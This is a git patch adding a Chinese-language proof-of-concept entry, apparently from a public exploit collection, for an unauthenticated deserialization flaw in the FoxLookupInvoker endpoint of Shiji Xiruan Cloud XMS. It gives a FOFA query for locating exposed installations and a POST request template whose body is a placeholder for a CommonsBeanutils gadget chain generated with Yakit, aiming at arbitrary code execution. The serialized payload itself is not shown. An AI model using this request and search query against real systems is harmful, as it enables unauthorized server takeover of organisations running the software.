From b35147eebd6c6bf7f278a0150a905b9b458c01d0 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 31 Dec 2023 23:20:44 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=A5=BF=E8=BD=AF=E4=BA=91XMS?= =?UTF-8?q?=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
西软云XMS反序列化漏洞.md | 23 +++++++++++++++++++++++
1 file changed, 23 insertions(+)
create mode 100644 西软云XMS反序列化漏洞.md
diff --git a/西软云XMS反序列化漏洞.md b/西软云XMS反序列化漏洞.md
new file mode 100644
index 0000000..c01debc
--- /dev/null
+++ b/西软云XMS反序列化漏洞.md
@@ -0,0 +1,23 @@
+## 西软云XMS反序列化漏洞
+
+西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,未经身份认证的攻击者可利用此漏洞执行任意代码,获取服务器权限。
+
+## fofa
+```
+app="shiji-西软云XMS"
+```
+
+## poc
+```
+POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Connection: close
+
+{{hexdec(cb18x的序列化链)}
+```
+使用yakit 生成payload
+![c5fe271fed6a284b93b64e1023b2b581](https://github.com/wy876/POC/assets/139549762/2b6a22d6-7125-4f43-ae6a-253a92d83d23)
+
+![e79d4907bddf12878c085d3146d856bc](https://github.com/wy876/POC/assets/139549762/799da585-0c34-431e-baa8-f939b19610a3)
+